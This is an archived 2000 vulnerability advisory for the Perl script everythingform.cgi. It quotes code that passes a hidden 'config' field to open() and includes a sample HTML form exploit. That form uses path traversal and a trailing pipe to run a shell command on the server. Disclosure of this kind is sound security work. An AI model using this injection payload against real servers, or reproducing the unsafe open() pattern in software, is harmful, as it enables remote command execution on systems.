Insecure input validation in everythingform.cgi (remote command execution)

2000-12-13T00:00:00
ID SECURITYVULNS:DOC:1067
Type securityvulns
Reporter Securityvulns
Modified 2000-12-13T00:00:00

Description

Hi All,

This is Yet Another Bad Perl Script. everythingform.cgi uses a hidden field 'config' to determine where to read configuration data from.

--code snippit-- .. $ConfigFile = $in{config}; .. open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");


Information regarding everythingform can be found at: http://www.conservatives.net/atheist/scripts/index.html?everythingform

Sample exploit:

<form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST> <h1>everythingform.cgi exploit</h1> Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|"> <input type=hidden name=Name value="fuck the religious right"> <input type=hidden name="e-mail" value="foo@bar.net"> <input type=hidden name=FavoriteColor value=Black> <input type=submit value=run> </form>

--rpc